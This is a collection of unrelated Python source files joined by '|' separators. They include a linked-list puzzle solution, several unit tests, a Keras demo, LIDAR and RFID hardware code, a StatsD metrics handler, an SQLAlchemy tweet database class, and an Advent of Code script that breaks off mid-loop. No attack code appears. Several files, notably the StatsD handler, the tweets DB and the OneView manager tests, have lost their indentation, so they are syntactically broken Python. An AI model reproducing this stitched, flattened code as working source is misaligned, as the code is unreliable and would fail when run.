# Definition for singly-linked list.
# class ListNode:
#     def __init__(self, val=0, next=None):
#         self.val = val
#         self.next = next
class Solution:
    def reorderList(self, head: 'ListNode') -> None:
        """
        Do not return anything, modify head in-place instead.
        """
        if head is None or head.next is None or head.next.next is None:
            return
        # Split: fast moves two steps per slow step, so slow lands on the middle.
        fast, slow = head, head
        while fast and fast.next:
            fast = fast.next.next
            slow = slow.next
        # Reverse the second half in place.
        second = slow.next
        prev = None
        slow.next = None
        while second:
            next_node = second.next
            second.next = prev
            prev = second
            second = next_node
        # Merge: interleave the reversed second half into the first half.
        while prev:
            next_node = prev
            prev = prev.next
            next_node.next = head.next
            head.next = next_node
            head = head.next.next
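
# --- Hedged usage sketch (not part of the original solution): builds
# 1->2->3->4->5, reorders it, and prints the values, using a concrete
# ListNode matching the commented-out definition above.
class ListNode:
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

def _demo_reorder():
    head = ListNode(1)
    tail = head
    for v in range(2, 6):
        tail.next = ListNode(v)
        tail = tail.next
    Solution().reorderList(head)
    values = []
    while head:
        values.append(head.val)
        head = head.next
    print(values)  # expected: [1, 5, 2, 4, 3]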
|
import allure
import pytest
from tests.helpers import url_path_for
@allure.feature('Utilities')
@allure.story('Testing internal utilities')
@allure.label('layer', 'unit')
@pytest.mark.parametrize(
    'name,query_params,path_params,expected',
    [
        ('get_list_of_shares', {}, {}, '/api/shares/'),
        ('get_list_of_shares', {'limit': 10}, {}, '/api/shares/?limit=10'),
        ('get_share', {}, {'ticker': 'TSLA'}, '/api/shares/TSLA/'),
        ('get_share', {'limit': 10}, {'ticker': 'TSLA'}, '/api/shares/TSLA/?limit=10'),
    ],
)
def test_url_path_for(name, query_params, path_params, expected):
    assert url_path_for(name, query_params=query_params, **path_params) == expected
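
# --- Hedged sketch (an assumption, not the project's actual tests.helpers
# code): one way url_path_for could satisfy the cases above -- resolve the
# route name to a path template, fill path params, append encoded query params.
from urllib.parse import urlencode

_ROUTES = {  # hypothetical route table
    'get_list_of_shares': '/api/shares/',
    'get_share': '/api/shares/{ticker}/',
}

def _url_path_for_sketch(name, query_params=None, **path_params):
    path = _ROUTES[name].format(**path_params)
    if query_params:
        path = '{}?{}'.format(path, urlencode(query_params))
    return path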
|
from sklearn.datasets import make_circles
from tensorflow.keras.layers import Dense, BatchNormalization, GaussianNoise
from tensorflow.keras.models import Sequential
from tensorflow.keras.regularizers import l2
from tensorflow.keras.optimizers import SGD
from tensorflow.keras.callbacks import EarlyStopping
from matplotlib import pyplot
X, y = make_circles(n_samples=1000, noise=0.1, random_state=1)
# print(X, y)
n_train = 500
trainX, testX = X[:n_train, :], X[n_train:, :]
trainy, testy = y[:n_train], y[n_train:]
model = Sequential()
model.add(Dense(50, input_dim=2, activation="relu", kernel_regularizer=l2(0.01)))
model.add(BatchNormalization())
# model.add(GaussianNoise(stddev=0.01))
model.add(Dense(1, activation="sigmoid"))
opt = SGD(learning_rate=0.01, momentum=0.9)  # 'lr' is the deprecated alias
model.compile(loss="binary_crossentropy", optimizer=opt, metrics=['accuracy'])
es = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=200)
history = model.fit(trainX,
trainy,
validation_data=(testX, testy),
epochs=1000,
batch_size=len(trainX),
verbose=1, callbacks=[es])
_, train_acc = model.evaluate(trainX, trainy, verbose=1)
_, test_acc = model.evaluate(testX, testy, verbose=1)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
pyplot.subplot(211)
pyplot.title('Cross-Entropy Loss', pad=-40)
pyplot.plot(history.history['loss'], label='train')
pyplot.plot(history.history['val_loss'], label='test')
pyplot.legend()
pyplot.grid()
# plot accuracy learning curves
pyplot.subplot(212)
pyplot.title('Accuracy', pad=-40)
pyplot.plot(history.history['accuracy'], label='train')
pyplot.plot(history.history['val_accuracy'], label='test')
pyplot.legend()
pyplot.grid()
pyplot.show()
|
from training_functions import *
|
from Sensors.LIDAR.LIDAR_Interface import LIDAR_Interface
from Sensors.LIDAR.Utils import Ray, Stack
from math import cos, sin, pi, floor
import pygame
import time
screen_x = 400
screen_y = 400
lidar = LIDAR_Interface(loc="/dev/ttyUSB0")
def main():
    global screen_y, screen_x, lidar
    lidar.start()
    pygame.init()
    screen = pygame.display.set_mode((screen_x, screen_y))
    pygame.mouse.set_visible(False)
    screen.fill(pygame.Color(0, 0, 0))
    dur = time.perf_counter()
    try:
        while True:
            # pop_recent_scan appears to be a property on LIDAR_Interface,
            # hence no call parentheses.
            current_scan = lidar.pop_recent_scan
            if current_scan is not None:
                for i in range(len(current_scan)):
                    rads = current_scan[i].theta * pi / 180.0
                    x = current_scan[i].radius / 25 * cos(rads)
                    y = current_scan[i].radius / 25 * sin(rads)
                    point = (int(x + (screen_x / 2)), int(y + (screen_y / 2)))
                    screen.set_at(point, pygame.Color(255, 255, 255))
                    # print("Point", i)
                    # print("Angle:", current_scan[i].theta, "Radius:", current_scan[i].radius)
                pygame.display.update()
                print("time", time.perf_counter() - dur)
                dur = time.perf_counter()
    except KeyboardInterrupt:
        lidar.stop_thread()
        lidar.stop_motor()
        lidar.stop_sensor()
        lidar.exit_func()


if __name__ == "__main__":
    main()
|
from app.core.error_success_data_result import ErrorDataResult
from app.core.messages import Messages
from app.models.log_model import LogModel
from app.models.credit_card_model import CreditCardModel
from app.dataAccess.log_data_dal import LogDataDal
import simplejson as json
from datetime import datetime
class LogDataManager:
    def __init__(self):
        self.log_data_dal = LogDataDal()

    def create_log(self, log_type, userId, action, message):
        try:
            information = f"userID={userId}, action={action}, message={message}"
            log_info_model = LogModel(log_type=log_type,
                                      created_at=str(datetime.now()),
                                      information=information)
            log_model_dict = log_info_model.__dict__
            jsonStr = json.dumps(log_model_dict)
            self.insert_log(log_model_dict)
            print(jsonStr)
        except Exception as err:
            # str(err) carries the actual error message; err.__doc__ is only
            # the exception class docstring.
            return ErrorDataResult(message=str(err))

    def insert_log(self, data):
        try:
            self.log_data_dal.insert_data_log(data)
        except Exception as err:
            return ErrorDataResult(message=str(err))
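
# --- Hedged usage sketch: recording an audit-style entry; the argument
# values are illustrative, and LogDataDal/LogModel come from the imports above.
# LogDataManager().create_log("INFO", userId=42, action="login", message="ok")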
|
# -*- coding: utf-8 -
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
# Copyright 2011 Cloudant, Inc.
import re
import six
import math
import time
import logging
import threading
import bucky2.udpserver as udpserver
log = logging.getLogger(__name__)
class StatsDHandler(threading.Thread):
def __init__(self, queue, flush_time=10):
super(StatsDHandler, self).__init__()
self.daemon = True
self.queue = queue
self.lock = threading.Lock()
self.timers = {}
self.gauges = {}
self.counters = {}
self.flush_time = flush_time
        self.key_res = (
            (re.compile(r"\s+"), "_"),
            (re.compile(r"\/"), "-"),
            (re.compile(r"[^a-zA-Z_\-0-9\.]"), "")
        )
def run(self):
while True:
time.sleep(self.flush_time)
stime = int(time.time())
with self.lock:
num_stats = self.enqueue_timers(stime)
num_stats += self.enqueue_counters(stime)
num_stats += self.enqueue_gauges(stime)
self.enqueue("stats.numStats", num_stats, stime)
def enqueue(self, name, stat, stime):
# No hostnames on statsd
self.queue.put((None, name, stat, stime))
def enqueue_timers(self, stime):
ret = 0
iteritems = self.timers.items() if six.PY3 else self.timers.iteritems()
for k, v in iteritems:
# Skip timers that haven't collected any values
if not v:
continue
v.sort()
pct_thresh = 90
count = len(v)
vmin, vmax = v[0], v[-1]
mean, vthresh = vmin, vmax
if count > 1:
thresh_idx = int(math.floor(pct_thresh / 100.0 * count))
v = v[:thresh_idx]
vthresh = v[-1]
vsum = sum(v)
mean = vsum / float(len(v))
self.enqueue("stats.timers.%s.mean" % k, mean, stime)
self.enqueue("stats.timers.%s.upper" % k, vmax, stime)
t = int(pct_thresh)
self.enqueue("stats.timers.%s.upper_%s" % (k, t), vthresh, stime)
self.enqueue("stats.timers.%s.lower" % k, vmin, stime)
self.enqueue("stats.timers.%s.count" % k, count, stime)
self.timers[k] = []
ret += 1
return ret
def enqueue_gauges(self, stime):
ret = 0
iteritems = self.gauges.items() if six.PY3 else self.gauges.iteritems()
for k, v in iteritems:
self.enqueue("stats.gauges.%s" % k, v, stime)
ret += 1
return ret
def enqueue_counters(self, stime):
ret = 0
iteritems = self.counters.items() if six.PY3 else self.counters.iteritems()
for k, v in iteritems:
self.enqueue("stats.%s" % k, v / self.flush_time, stime)
self.enqueue("stats_counts.%s" % k, v, stime)
self.counters[k] = 0
ret += 1
return ret
def handle(self, data):
# Adding a bit of extra sauce so clients can
# send multiple samples in a single UDP
# packet.
for line in data.splitlines():
self.line = line
if not line.strip():
continue
self.handle_line(line)
def handle_line(self, line):
bits = line.split(":")
key = self.handle_key(bits.pop(0))
if not bits:
self.bad_line()
return
# I'm not sure if statsd is doing this on purpose
# but the code allows for name:v1|t1:v2|t2 etc etc.
# In the interest of compatibility, I'll maintain
# the behavior.
for sample in bits:
if not "|" in sample:
self.bad_line()
continue
fields = sample.split("|")
if fields[1] == "ms":
self.handle_timer(key, fields)
elif fields[1] == "g":
self.handle_gauge(key, fields)
else:
self.handle_counter(key, fields)
def handle_key(self, key):
for (rexp, repl) in self.key_res:
key = rexp.sub(repl, key)
return key
def handle_timer(self, key, fields):
try:
val = float(fields[0] or 0)
with self.lock:
self.timers.setdefault(key, []).append(val)
except ValueError:
self.bad_line()
def handle_gauge(self, key, fields):
valstr = fields[0] or "0"
try:
val = float(valstr)
except ValueError:
self.bad_line()
return
delta = valstr[0] in ["+", "-"]
with self.lock:
if delta and key in self.gauges:
self.gauges[key] = self.gauges[key] + val
else:
self.gauges[key] = val
def handle_counter(self, key, fields):
rate = 1.0
if len(fields) > 2 and fields[2][:1] == "@":
try:
rate = float(fields[2][1:].strip())
except ValueError:
rate = 1.0
try:
val = int(float(fields[0] or 0) / rate)
except (ValueError, ZeroDivisionError):
self.bad_line()
return
with self.lock:
if key not in self.counters:
self.counters[key] = 0
self.counters[key] += val
def bad_line(self):
log.error("StatsD: Invalid line: '%s'", self.line.strip())
class StatsDServer(udpserver.UDPServer):
def __init__(self, queue, cfg):
super(StatsDServer, self).__init__(cfg.statsd_ip, cfg.statsd_port)
self.handler = StatsDHandler(queue, flush_time=cfg.statsd_flush_time)
def run(self):
self.handler.start()
super(StatsDServer, self).run()
if six.PY3:
def handle(self, data, addr):
self.handler.handle(data.decode())
if not self.handler.is_alive():
return False
return True
else:
def handle(self, data, addr):
self.handler.handle(data)
if not self.handler.is_alive():
return False
return True
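
# --- Hedged demo (not part of bucky2): the statsd wire formats this handler
# accepts, pushed through handle() -- counters "v|c" (optional "|@rate"),
# timers "v|ms", and gauges "v|g" (a leading +/- applies a delta).
def _statsd_demo():
    from six.moves import queue
    h = StatsDHandler(queue.Queue(), flush_time=1)
    h.handle("gorets:1|c\nglork:320|ms\ngaugor:333|g\nsampled:7|c|@0.1")
    return h.counters, h.timers, h.gauges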
|
import pynlpir
import re
pynlpir.open()
s = '不让我上桌吃饭我还不会自己抢吗![doge][doge][doge](投稿:@还没怀上的葛一他麻麻)http://t.cn/RqKTebK '
stop = [line.strip() for line in open('ad/stop.txt', 'r', encoding='utf-8')]  # stop words
print(list(set(pynlpir.segment(s, pos_tagging=False))))
#['cn', '全民', 'R68kD0I', '饮酒', '醉', ' ', '一人', 'K', 't', '甜', '听听', '歌', '一首歌', '♥', 'http', '酸', '唱']
#['听听', '全民', '点', '@全民K歌', '首', ' ', '酸', 'http://t.cn/R68kD0I', '饮酒', '唱', '歌', '醉', 'K', '♥有点', '甜']
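
# --- Hedged follow-up: the stop list loaded above is otherwise unused here;
# filtering the segmented tokens against it would look like this.
tokens = [w for w in pynlpir.segment(s, pos_tagging=False) if w not in stop]
print(tokens)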
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# FILE: ExampleTweetsDB.py
#
# An object for managing the fitness tweet collection
#
# Copyright by Author. All rights reserved. Not for reuse without
# express permissions.
#
#
from sochi.data.db.base.TweetsDB import TweetsDB
from sochi.data.db.sochi.ExampleTweetObj import ExampleTweetObj
from sochi.data.db.sochi.ExampleUserObj import ExampleUserObj
from sochi.data.db.sochi.ExampleUserMetaObj import ExampleUserMetaObj
from sochi.data.db.sochi.ExampleFollowerObj import ExampleFollowerObj
from sochi.data.db.sochi.ExampleFriendObj import ExampleFriendObj
from sqlalchemy.orm import mapper, class_mapper
from sqlalchemy.orm.exc import UnmappedClassError
import sys
class ExampleTweetsDB(TweetsDB):
def __init__(self, config=None):
TweetsDB.__init__(self, config=config)
try:
self.tweet_mapper = class_mapper(ExampleTweetObj)
except UnmappedClassError:
self.tweet_mapper = mapper(ExampleTweetObj,self.tweet_table)
try:
self.user_mapper = class_mapper(ExampleUserObj)
except UnmappedClassError:
self.user_mapper = mapper(ExampleUserObj,self.user_table)
try:
self.user_meta_mapper = class_mapper(ExampleUserMetaObj)
except UnmappedClassError:
self.user_meta_mapper = mapper(ExampleUserMetaObj,self.user_meta_table)
try:
self.friend_mapper = class_mapper(ExampleFriendObj)
except UnmappedClassError:
self.friend_mapper = mapper(ExampleFriendObj,self.friends_table)
try:
self.follower_mapper = class_mapper(ExampleFollowerObj)
except UnmappedClassError:
self.follower_mapper = mapper(ExampleFollowerObj,self.followers_table)
##
# New object creation routines
##
## Create "tweet" objects and records
def new_tweet_table_item(self, rec=None):
nto = ExampleTweetObj()
if( rec ):
return nto.from_dict(rec)
return nto
def tweet_table_item_to_dict(self, tto=None):
rec = {}
if( tto ):
rec = tto.to_dict()
return rec
## Create "user" objects and records
def new_user_table_item(self, rec=None):
uto = ExampleUserObj()
if( rec ):
return uto.from_dict(rec)
return uto
def user_table_item_to_dict(self, uto=None):
rec = {}
if( uto ):
rec = uto.to_dict()
return rec
## Create "user_meta" objects and records
def new_user_meta_table_item(self, rec=None):
umto = ExampleUserMetaObj()
if( rec ):
return umto.from_dict(rec)
return umto
def user_meta_table_item_to_dict(self, umto=None):
rec = {}
if( umto ):
rec = umto.to_dict()
return rec
## Create "friend" objects and records
def new_friend_table_item(self, rec=None):
nf = ExampleFriendObj()
if( rec ):
return nf.from_dict(rec)
return nf
def friend_table_item_to_dict(self, nf=None):
rec = {}
if( nf ):
rec = nf.to_dict()
return rec
## Create "follower" objects and records
def new_follower_table_item(self, rec=None):
nf = ExampleFollowerObj()
if( rec ):
return nf.from_dict(rec)
return nf
def follower_table_item_to_dict(self, nf=None):
rec = {}
if( nf ):
rec = nf.to_dict()
return rec
##
# straightforward query types
##
##
## Query the tweet table
##
def query_tweet_table_by_tweet_id(self, tid):
t = self.session.query(ExampleTweetObj).filter(ExampleTweetObj.tweet_id==tid).all()
return t
def query_tweet_table_by_username(self, uname=None, start_date=None, end_date=None):
q = self._tweet_table_date_range(start_date=start_date, end_date=end_date)
q = q.filter(ExampleTweetObj.from_user==uname)
tlist = q.all()
return tlist
def query_tweet_table_by_user_id(self, uid=None, start_date=None, end_date=None):
q = self._tweet_table_date_range(start_date=start_date, end_date=end_date)
q = q.filter(ExampleTweetObj.from_user_id==uid)
tlist = q.all()
return tlist
def query_tweet_table_by_tweet_substr(self, substr=None, start_date=None, end_date=None):
qtext = "%"+substr+"%"
q = self._tweet_table_date_range(start_date=start_date, end_date=end_date)
q = q.filter(ExampleTweetObj.tweet_text.like(qtext))
tlist = q.all()
return tlist
def _tweet_table_date_range(self, start_date=None, end_date=None):
query = self.session.query(ExampleTweetObj)
if( start_date and end_date ):
query = query.filter(ExampleTweetObj.created_at>=start_date)
query = query.filter(ExampleTweetObj.created_at<end_date)
elif( start_date ):
query = query.filter(ExampleTweetObj.created_at>=start_date)
elif( end_date ):
query = query.filter(ExampleTweetObj.created_at<end_date)
else:
pass
return query
##
## Query the user table
##
def query_user_table_by_record_id(self, rid=None, rid2=None):
if( rid2 ):
q = self.session.query(ExampleUserObj).filter(ExampleUserObj.rid>=rid)
tlist = q.filter(ExampleUserObj.rid<rid2).all()
else:
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.rid==rid).all()
return tlist
def query_user_table_by_fullname(self, sname):
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.screen_name==sname).all()
return tlist
def query_user_table_by_screenname(self, sname):
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.screen_name==sname).all()
return tlist
def query_user_table_by_username(self, uname):
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.user_name==uname).all()
return tlist
def query_user_table_by_user_id(self, uid):
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.user_id==uid).all()
return tlist
##
## Query the user_meta table
##
def query_user_meta_table_by_fullname(self, sname):
tlist = self.session.query(ExampleUserMetaObj).filter(ExampleUserMetaObj.screen_name==sname).all()
return tlist
def query_user_meta_table_by_screenname(self, sname):
tlist = self.session.query(ExampleUserMetaObj).filter(ExampleUserMetaObj.screen_name==sname).all()
return tlist
def query_user_meta_table_by_username(self, uname):
tlist = self.session.query(ExampleUserMetaObj).filter(ExampleUserMetaObj.user_name==uname).all()
return tlist
def query_user_meta_table_by_user_id(self, uid):
tlist = self.session.query(ExampleUserMetaObj).filter(ExampleUserMetaObj.user_id==uid).all()
return tlist
##
## Query the friends table
##
def query_friends_by_username(self, uname=None, fname=None):
q = self.session.query(ExampleFriendObj).filter(ExampleFriendObj.user==uname)
if( fname ):
q = q.filter(ExampleFriendObj.friend==fname)
flist = q.all()
return flist
def query_friends_by_user_id(self, uid=None, fid=None):
q = self.session.query(ExampleFriendObj).filter(ExampleFriendObj.user_id==uid)
if( fid ):
q = q.filter(ExampleFriendObj.friend_id==fid)
flist = q.all()
return flist
##
## Query the followers table
##
def query_followers_by_username(self, uname=None, fname=None):
q = self.session.query(ExampleFollowerObj).filter(ExampleFollowerObj.user==uname)
if( fname ):
q = q.filter(ExampleFollowerObj.follower==fname)
flist = q.all()
return flist
def query_followers_by_user_id(self, uid=None, fid=None):
q = self.session.query(ExampleFollowerObj).filter(ExampleFollowerObj.user_id==uid)
if( fid ):
q = q.filter(ExampleFollowerObj.follower_id==fid)
flist = q.all()
return flist
|
from piri.functions import apply_slicing
def test_no_value_is_ok():
    """When value is None we get None back."""
    assert apply_slicing(None, {}) is None


def test_slice_middle_of_value():
    """Test that we can get a value in the middle of a string."""
    assert apply_slicing('test', {'from': 1, 'to': 3}) == 'es'


def test_slice_middle_to_end():
    """Test that we can slice from the middle to the end of a value."""
    assert apply_slicing('test', {'from': 1}) == 'est'


def test_slice_start_to_middle():
    """Test that we can slice from the start to the middle."""
    assert apply_slicing('test', {'from': 0, 'to': 3}) == 'tes'


def test_slice_start_to_end():
    """Test that we can slice from start to end."""
    assert apply_slicing('test', {'from': 0, 'to': None}) == 'test'


def test_slice_negative_from():
    """Test that a negative 'from' starts the cut at the end minus 'from'."""
    assert apply_slicing('012345', {'from': -2}) == '45'


def test_slice_negative_to():
    """Test that a negative 'to' ends the cut at the end minus 'to'."""
    assert apply_slicing('01234', {'from': 0, 'to': -2}) == '012'
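
# --- Hedged sketch (an assumption, not piri's actual implementation): an
# apply_slicing consistent with the tests above, leaning on Python slice
# semantics, where missing 'from'/'to' default to None.
def _apply_slicing_sketch(value, slicing):
    if value is None or not slicing:
        return value
    return value[slicing.get('from'):slicing.get('to')]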
|
import serial
from serial.tools import list_ports
import time
class Ares:
def __init__(self, robot, camera, info):
self.robot = robot
self.camera = camera
self.max_speed = info['max_speed']
self.max_rotation = info['max_rotation']
self.k = 1
def compute_vector(self, target, area, x, hr):
"""
From given Theia data, compute desired movement vector.
:param target: The target area of the object.
:param area: The current area of the object..
:param x: The x-center of the target.
:param hr: Head rotation.
:return: (forward, rotation).
"""
# Compute absolute r.
dr = (x - 0.5 * self.camera.width) * -1
r = dr / self.camera.width * (self.camera.fx / 2)
r += hr
# Get range bounds.
servo = self.robot.head[0]
low = servo.left_bound - self.camera.fx / 2
high = servo.right_bound + self.camera.fx / 2
mid = (low + high) / 2
delta = abs(high - mid)
# Compute magnitude of r.
if abs(r - mid) <= 5:
# Close enough to target.
rotation = 0
elif r > mid:
# Left turn.
rotation = abs(self.max_rotation * r / delta)
else:
# Right turn.
rotation = abs(self.max_rotation * r / delta)
rotation *= -1
if rotation > 0.5:
# Too much rotation, perform in place turn.
forward = 0
else:
v = self.max_speed - self.max_speed * area / target
if abs(v) < 0.5:
# Too slow. No need to move.
forward = 0
else:
forward = v
# Round because rounded things are better.
rotation = round(rotation, 2)
forward = round(forward, 2)
return forward, rotation
class RFID:
def __init__(self, port=None):
"""
RFID reader class for SparkFun's USB RFID Reader.
:param port: The virtual port number.
"""
if port is not None:
self.port = port
else:
ports = list(list_ports.grep(r'(?i)0403'))
if len(ports) == 1:
self.port = ports[0][0]
else:
raise Exception('Unable to determine RFID reader port automatically. Please specify.')
# Start a connection using pyserial.
        try:
            self.usb = serial.Serial(self.port, timeout=0)
        except serial.SerialException:
            raise Exception('Unable to connect to RFID reader at %s.' % self.port)
    def read(self):
        """
        Reads the buffer. Returns immediately.
        :return: A 12-character RFID code, or None if not available.
        """
        if self.usb.in_waiting >= 16:
data = self.usb.read(size=16)
data = data.decode()
# Assert for debugging verification.
assert(data[0] == '\x02')
assert(data[13:] == '\r\n\x03')
rfid = data[1:13]
return rfid
else:
return None
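
# --- Hedged usage sketch: polling the reader until a tag shows up; uses the
# 'time' import at the top of this file.
def _poll_rfid():
    reader = RFID()
    while True:
        tag = reader.read()
        if tag:
            return tag
        time.sleep(0.05)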
|
from .block import *
from .core import *
from .external import *
from .pipeline import *
from .source import *
from .transform import *
|
"""Base word embedding"""
import torch
import torch.nn as nn
import os
from bootleg.utils import logging_utils
class BaseWordEmbedding(nn.Module):
"""
Base word embedding class. We split the word embedding from the sentence encoder, similar to BERT.
Attributes:
pad_id: id of the pad word index
"""
def __init__(self, args, main_args, word_symbols):
super(BaseWordEmbedding, self).__init__()
self.logger = logging_utils.get_logger(main_args)
self._key = "word"
self.pad_id = word_symbols.pad_id
def freeze_params(self):
for name, param in self.named_parameters():
param.requires_grad = False
self.logger.debug(f'Freezing {name}')
return
    # This mask is for downstream pytorch multiheadattention, which treats
    # True as MASK (i.e., IGNORE): the mask is True wherever an index equals
    # the pad id. Note: a BERT model uses the reverse convention, so this
    # mask cannot be used there.
    def get_downstream_mask(self, word_indices):
        return word_indices == self.pad_id

    def forward(self, word_indices):
        raise NotImplementedError

    def get_dim(self):
        raise NotImplementedError

    def get_key(self):
        raise NotImplementedError
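
# --- Hedged sketch (not from bootleg): a minimal subclass illustrating the
# contract above; vocab_size/dim are made-up parameters for the example, and
# pad_id is assumed to be a valid index below vocab_size.
class ToyWordEmbedding(BaseWordEmbedding):
    def __init__(self, args, main_args, word_symbols, vocab_size=1000, dim=300):
        super(ToyWordEmbedding, self).__init__(args, main_args, word_symbols)
        self.embed = nn.Embedding(vocab_size, dim, padding_idx=self.pad_id)

    def forward(self, word_indices):
        return self.embed(word_indices)

    def get_dim(self):
        return self.embed.embedding_dim

    def get_key(self):
        return self._key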
|
# -*- coding: utf-8 -*-
# Copyright (2017-2018) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Python libs
import json
from unittest import mock
# 3rd party libs
from flask_api import status
from hpOneView.exceptions import HPOneViewException
# Module libs
from oneview_redfish_toolkit.blueprints import manager
from oneview_redfish_toolkit.tests.base_flask_test import BaseFlaskTest
class TestManager(BaseFlaskTest):
"""Tests for Managers blueprint
Tests:
- enclosures
- known value
- not found error
- unexpected error
- blades
"""
    @classmethod
    def setUpClass(cls):
        super(TestManager, cls).setUpClass()
        cls.app.register_blueprint(manager.manager)
#############
# Enclosure #
#############
@mock.patch.object(manager, 'g')
    def test_get_enclosure_manager(self, g):
        """Tests EnclosureManager with a known Enclosure"""
# Loading Enclosure mockup value
with open(
'oneview_redfish_toolkit/mockups/oneview/Enclosure.json'
) as f:
ov_enclosure = json.load(f)
# Loading EnclosureManager mockup result
with open(
'oneview_redfish_toolkit/mockups/redfish/EnclosureManager.json'
) as f:
rf_enclosure_manager = json.load(f)
g.oneview_client.index_resources.get_all.return_value = \
[{"category": "enclosures"}]
g.oneview_client.enclosures.get.return_value = ov_enclosure
        g.oneview_client.appliance_node_information.get_version.return_value = \
            {"softwareVersion": "3.00.07-0288219"}
# Get EnclosureManager
response = self.client.get(
"/redfish/v1/Managers/0000000000A66101"
)
result = json.loads(response.data.decode("utf-8"))
# Tests response
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual("application/json", response.mimetype)
self.assertEqual(rf_enclosure_manager, result)
self.assertEqual(
"{}{}".format("W/", ov_enclosure["eTag"]),
response.headers["ETag"])
@mock.patch.object(manager, 'g')
def test_get_enclosure_not_found(self, g):
"""Tests EnclosureManager with Enclosure not found"""
g.oneview_client.index_resources.get_all.return_value = \
[{"category": "enclosures"}]
g.oneview_client.enclosures.get.return_value = \
{'enclosureUri': 'invalidUri'}
e = HPOneViewException({
'errorCode': 'RESOURCE_NOT_FOUND',
'message': 'enclosure not found',
})
g.oneview_client.enclosures.get.side_effect = e
response = self.client.get(
"/redfish/v1/Managers/0000000000A66101"
)
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
self.assertEqual("application/json", response.mimetype)
@mock.patch.object(manager, 'g')
def test_enclosure_unexpected_error(self, g):
"""Tests EnclosureManager with an unexpected error"""
g.oneview_client.index_resources.get_all.return_value = \
[{"category": "enclosures"}]
g.oneview_client.enclosures.get.side_effect = Exception()
response = self.client.get(
"/redfish/v1/Managers/0000000000A66101"
)
self.assertEqual(
status.HTTP_500_INTERNAL_SERVER_ERROR,
response.status_code)
self.assertEqual("application/json", response.mimetype)
#############
# Blade #
#############
@mock.patch.object(manager, 'g')
    def test_get_blade_manager(self, g):
        """Tests BladeManager with a known Server Hardware"""
# Loading ServerHardware mockup value
with open(
'oneview_redfish_toolkit/mockups/oneview/ServerHardware.json'
) as f:
server_hardware = json.load(f)
# Loading BladeManager mockup result
with open(
'oneview_redfish_toolkit/mockups/redfish/BladeManager.json'
) as f:
blade_manager_mockup = json.load(f)
g.oneview_client.index_resources.get_all.return_value = \
[{"category": "server-hardware"}]
g.oneview_client.server_hardware.get.return_value = server_hardware
        g.oneview_client.appliance_node_information.get_version.return_value = \
            {"softwareVersion": "3.00.07-0288219"}
# Get BladeManager
response = self.client.get(
"/redfish/v1/Managers/30303437-3034-4D32-3230-313133364752"
)
result = json.loads(response.data.decode("utf-8"))
# Tests response
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual("application/json", response.mimetype)
self.assertEqual(blade_manager_mockup, result)
self.assertEqual(
"{}{}".format("W/", server_hardware["eTag"]),
response.headers["ETag"])
@mock.patch.object(manager, 'g')
def test_get_server_hardware_not_found(self, g):
"""Tests BladeManager with Server Hardware not found"""
g.oneview_client.index_resources.get_all.return_value = [
{"category": "server-hardware"}]
g.oneview_client.server_hardware.get.return_value =\
{'serverHardwareUri': 'invalidUri'}
e = HPOneViewException({
'errorCode': 'RESOURCE_NOT_FOUND',
'message': 'server hardware not found',
})
g.oneview_client.server_hardware.get.side_effect = e
response = self.client.get(
"/redfish/v1/Managers/30303437-3034-4D32-3230-313133364752"
)
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
self.assertEqual("application/json", response.mimetype)
@mock.patch.object(manager, 'g')
def test_server_hardware_unexpected_error(self, g):
"""Tests BladeManager with an unexpected error"""
g.oneview_client.index_resources.get_all.return_value = [
{"category": "server-hardware"}]
g.oneview_client.server_hardware.get.side_effect = Exception()
response = self.client.get(
"/redfish/v1/Managers/30303437-3034-4D32-3230-313133364752"
)
self.assertEqual(
status.HTTP_500_INTERNAL_SERVER_ERROR,
response.status_code)
self.assertEqual("application/json", response.mimetype)
|
"""
Invokable Module for CLI
python -m pcskcli
"""
from pcskcli.cli.main import cli
if __name__ == "__main__":
cli(prog_name="pcsk")
|
"""Tests for the HVV Departures integration."""
|
'''
Solution to Advent of Code, year 2021, day 5.
'''
import os
from collections import defaultdict

file = 'input.txt'  # Name of the file with input data.
path = os.path.dirname(__file__)  # Directory containing this script and the input file.
file_and_path = os.path.join(path, file)
with open(file_and_path, 'r') as input_file:
    lines = input_file.readlines()
points = defaultdict(int)
for line in lines:
    line = line.replace(' -> ', ',')
    coords = [int(x) for x in line.split(',')]
    x1 = coords[0]
    x2 = coords[2]
    y1 = coords[1]
    y2 = coords[3]
    delta_x = x2 - x1
    delta_y = y2 - y1
    if delta_x == 0:
        # Vertical line: walk y between the endpoints.
        if y2 > y1:
            for y in range(y1, y2 + 1):
                key = 'x' + str(x1) + 'y' + str(y)
                points[key] += 1
        else:
            for y in range(y2, y1 + 1):
                key = 'x' + str(x1) + 'y' + str(y)
                points[key] += 1
    elif delta_y == 0:
        # Horizontal line: walk x between the endpoints.
        if x2 > x1:
            for x in range(x1, x2 + 1):
                key = 'x' + str(x) + 'y' + str(y1)
                points[key] += 1
        else:
            for x in range(x2, x1 + 1):
                key = 'x' + str(x) + 'y' + str(y1)
                points[key] += 1
    elif delta_x > 0:
        # 45-degree diagonal, walking left to right from (x1, y1).
        y = y1
        for x in range(x1, x2 + 1):
            key = 'x' + str(x) + 'y' + str(y)
